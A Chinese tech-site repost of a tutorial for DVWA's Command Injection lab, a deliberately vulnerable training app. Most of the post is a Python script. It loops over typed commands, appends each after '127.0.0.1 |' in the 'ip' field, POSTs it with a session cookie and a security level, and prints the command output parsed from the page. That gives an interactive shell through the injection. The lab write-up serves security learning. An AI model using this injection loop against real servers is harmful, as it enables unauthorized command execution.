实用工具小学数学练习字帖生成在线画板函数绘制拼音字母表在线词典黄历查询中国历史 Excel函数模拟请求 json格式化

栏目分类:

子分类:

名师互学网

名师互学网用户登录

快速导航

当前搜索

当前分类

前沿技术软件开发系统运维产品运营生活办公面试经验考试题库

实用工具

学习工具小学数学练习字帖生成在线画板函数绘制拼音字母表在线词典黄历查询亲戚关系计算安全期计算中国历史 Excel函数模拟请求 json格式化浏览器指纹

名师互学网 > IT > 软件开发 > 后端开发 > Python

dvwa——Command Injection初级、中级和高级python脚本解法（一）

Python 更新时间：2026-04-08 03:32:41 发布时间：1534天前 IT归档最新发布模块sitemap 名妆网法律咨询聚返吧英语巴士网伯小乐网商动力

输入127.0.0.1命令，查看DVWA的command execute页面的源代码，如下图所示：

通过查询得知pre是唯一的,因此需要将返回页面中的pre标签提取出来，最为方便的是使用BeautifulSoup模块，这个模块的主要功能是解析并提取网页中的数据。

python爬虫——Beautiful Soup库（数据解析）详细说明_xiaofengdada的博客-CSDN博客

python爬虫——request模块（一）_xiaofengdada的博客-CSDN博客_python request

话不多说，直接上源码，不懂参考上面博客：

import requests
#import json
from bs4 import BeautifulSoup
while True:
    cmd = input("请输入您要执行的命令行：").strip()
    #if len(cmd) == 0:
        #continue
    if cmd == 'quit':
        break
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0',
        'cookie':'security=medium; PHPSESSID=9fvvn8hc6iq55cs3vgbpahvoj0'
    }
    url = "http://x.x.x.x/dvwa/vulnerabilities/exec/#"
    data = {
        'ip':'127.0.0.1 |%s'%cmd,
        'Submit':'Submit'
    }
    res = requests.post(url=url,headers=header,data=data)
    #print(res.text)
    marry =BeautifulSoup(res.text,'lxml')
    for pre in marry.find_all(name='pre'):
        print(pre.string)

输出结果：

初级和高级的只要把请求头里面的security设置为low和high即可！

转载请注明：文章转载自 www.mshxw.com

本文地址：https://www.mshxw.com/it/714213.html

上一篇年底入职的测试，天天早起晚睡，卷的让人直呼崩溃...

下一篇 strtok使用和memcpy的实现和memmove的实现

Python相关栏目本月热门文章

热门相关搜索

路由器设置木托盘宝塔面板儿童python教程心情低落朋友圈 vim 双一流学科专升本我的学校日记学校西点培训学校汽修学校情书化妆学校塔沟武校异形模板西南大学排名最精辟人生短句 6步教你追回被骗的钱南昌大学排名清朝十二帝北京印刷学院排名北方工业大学排名北京航空航天大学排名首都经济贸易大学排名中国传媒大学排名首都师范大学排名中国地质大学(北京)排名北京信息科技大学排名中央民族大学排名北京舞蹈学院排名北京电影学院排名中国戏曲学院排名河北政法职业学院排名河北经贸大学排名天津中德应用技术大学排名天津医学高等专科学校排名天津美术学院排名天津音乐学院排名天津工业大学排名北京工业大学耿丹学院排名北京警察学院排名天津科技大学排名北京邮电大学(宏福校区)排名北京网络职业学院排名北京大学医学部排名河北科技大学排名河北地质大学排名河北体育学院排名

关于我们文章归档网站地图联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号：晋ICP备2021003244-6号